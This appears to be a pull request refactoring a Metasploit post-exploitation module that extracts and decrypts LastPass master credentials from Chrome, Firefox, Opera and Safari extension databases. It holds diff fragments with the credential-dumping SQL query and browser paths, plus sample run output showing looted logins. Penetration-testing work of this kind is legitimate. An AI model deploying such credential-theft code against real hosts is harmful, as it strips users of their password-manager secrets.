### PR TITLE
Refactoring of LastPass post module

### DIFF
--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -10,16 +10,17 @@ class Metasploit3 < Msf::Post
   include Msf::Post::Unix
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'LastPass Master Password Extractor',
-      'Description' => %q{
-        This module extracts and decrypts LastPass master login accounts and passwords.
-      },
-      'License' => MSF_LICENSE,
-      'Author' => ['Alberto Garcia Illera <agarciaillera[at]gmail.com>', 'Martin Vigo <martinvigo[at]gmail.com>'],
-      'Platform' => %w(linux osx unix win),
-      'SessionTypes' => %w(meterpreter shell)
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'LastPass Master Password Extractor',
+        'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords',
+        'License' => MSF_LICENSE,
+        'Author' => ['Alberto Garcia Illera <agarciaillera[at]gmail.com>', 'Martin Vigo <martinvigo[at]gmail.com>'],
+        'Platform' => %w(linux osx unix win),
+        'SessionTypes' => %w(meterpreter shell)
+      )
+    )
   end
 
   def run
@@ -30,7 +31,7 @@ class Metasploit3 < Msf::Post
 
     print_status "Searching for LastPass databases..."
 
-    db_map = get_database_paths # Find databases and get the remote paths
+    db_map = database_paths # Find databases and get the remote paths
     if db_map.empty?
       print_status "No databases found"
       return
@@ -60,7 +61,11 @@ class Metasploit3 < Msf::Post
 
           # Parsing/Querying the DB
           db = SQLite3::Database.new(loot_path)
-          user, pass = db.execute("SELECT username, password FROM LastPassSavedLogins2 WHERE username IS NOT NULL AND username != '' AND password IS NOT NULL AND password != '';").flatten
+          user, pass = db.execute(
+            "SELECT username, password FROM LastPassSavedLogins2 " \
+            "WHERE username IS NOT NULL AND username != '' " \
+            "AND password IS NOT NULL AND password != '';"
+          ).flatten
           credentials << [user, pass, browser] if user && pass
         end
       end
@@ -78,9 +83,9 @@ class Metasploit3 < Msf::Post
   end
 
   # Finds the databases in the victim's machine
-  def get_database_paths
+  def database_paths
     platform = session.platform
-    existing_profiles = get_user_profiles
+    existing_profiles = user_profiles
     found_dbs_map = {
       'Chrome' => [],
       'Firefox' => [],
@@ -106,7 +111,7 @@ class Metasploit3 < Msf::Post
         print_status "Found user: #{user_profile['UserName']}"
         browser_path_map = {
           'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
-          'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox",
+          'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox"
         }
       end
     when /osx/
@@ -136,7 +141,7 @@ class Metasploit3 < Msf::Post
 
     print_status "Checking in #{browser}..."
     if browser == "Firefox" # Special case for Firefox
-      profiles = get_firefox_profile_files(path, browser)
+      profiles = firefox_profile_files(path, browser)
       unless profiles.empty?
         print_good "Found #{profiles.size} profile files in Firefox"
         found_dbs_paths |= profiles
@@ -149,7 +154,7 @@ class Metasploit3 < Msf::Post
   end
 
   # Returns the relevant information from user profiles
-  def get_user_profiles
+  def user_profiles
     user_profiles = []
     case session.platform
     when /unix|linux/
@@ -212,7 +217,7 @@ class Metasploit3 < Msf::Post
   end
 
   # Returns the profile files for Firefox
-  def get_firefox_profile_files(path, browser)
+  def firefox_profile_files(path, browser)
     found_dbs_paths = []
 
     if directory?(path)


### PR DESCRIPTION
There were two primary goals with this refactoring:
- Clean up the code a bit
- Store the browser from which the LastPass creds were looted

Tested it on Linux w/ Chrome and Firefox:

```
msf post(lastpass_creds) > run

[*] Searching for LastPass databases...
[*] Found user: jhart
[*] Checking in Chrome...
[+] Found 1 database/s in Chrome
[*] Checking in Firefox...
[+] Found 1 profile files in Firefox
[*] Looking for credentials in all databases found...
[*] Decrypting password for user jon_hart@rapid7.com from Chrome...
[*] Decrypting password for user jon_hart@rapid7.com from Firefox...
[+] LastPass credentials
====================

 Username             Password                Browser
 --------             --------                -------
 jon_hart@rapid7.com  blah1    Chrome
 jon_hart@rapid7.com  blah2  Firefox
```

On Windows with Chrome, Firefox, Safari and Opera:

```
msf post(lastpass_creds) > run

[*] Searching for LastPass databases...
[*] Found user: user
[*] Found user: cyg_server
[*] Found user: Administrator
[*] Checking in Chrome...
[+] Found 1 database/s in Chrome
[*] Checking in Firefox...
[+] Found 1 profile files in Firefox
[*] Checking in Opera...
[+] Found 1 database/s in Opera
[*] Checking in Safari...
[+] Found 1 database/s in Safari
[*] Looking for credentials in all databases found...
[*] Decrypting password for user jon_hart@rapid7.com from Chrome...
[*] Decrypting password for user jon_hart@rapid7.com from Opera...
[*] Decrypting password for user jon_hart@rapid7.com from Safari...
[+] LastPass credentials
====================

 Username             Password              Browser
 --------             --------              -------
 jon_hart@rapid7.com  blah  Chrome
 jon_hart@rapid7.com  blah  Opera
 jon_hart@rapid7.com  blah  Safari
```

(No, blah is not my password -- I changed it)

Extraction from Firefox 33 on Windows isn't, but it doesn't appear to have worked in the original PR either (it is also hard to tell because the creds in the original didn't retain the browser from which they were obtained).  The issue seems to be a different format, perhaps between Windows/Linux or different versions.  

With Firefox 33 on Linux, my prefs file looks like:

```
user_pref("extensions.lastpass.loginpws", "jon_hart%40rapid7.com=<blob>");
user_pref("extensions.lastpass.loginusers", "jon_hart%40rapid7.com");
```

Whereas Firefox 33 on Windows:

```
user_pref("extensions.lastpass.loginpws", "<base64something>");
user_pref("extensions.lastpass.loginusers", "jon_hart%40rapid7.com");
```

I haven't had time to dig into this further, but land this PR in your repo and then rapid7/metasploit-framework/#4004 will be nearly landable.
